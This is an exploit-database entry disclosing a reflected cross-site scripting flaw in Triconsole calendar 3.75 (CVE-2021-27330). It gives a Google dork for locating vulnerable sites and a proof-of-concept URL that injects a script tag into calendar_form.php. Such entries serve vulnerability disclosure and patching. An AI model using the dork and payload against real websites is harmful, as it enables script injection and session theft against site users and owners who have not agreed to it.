id: 35867
date: 02/26/2021
title: Triconsole 3.75 - Reflected XSS Vulnerability
author: Akash Chathoth
cves: CVE-2021-27330

# Exploit Title: Triconsole 3.75 - Reflected XSS
# Google Dork: inurl : /calendar/calendar_form.php
# Exploit Author: Akash Chathoth
# Vendor Homepage: http://www.triconsole.com/
# Software Link: http://www.triconsole.com/php/calendar_datepicker.php
# Version: < 3.76 (14 February 2021)
# Tested on: 3.75
# CVE: 2021-27330

# Exploit : http://exapmle.com/calendar_form.php/"><script>alert(document.domain)</script>


#  0day.today [2023-03-25]  #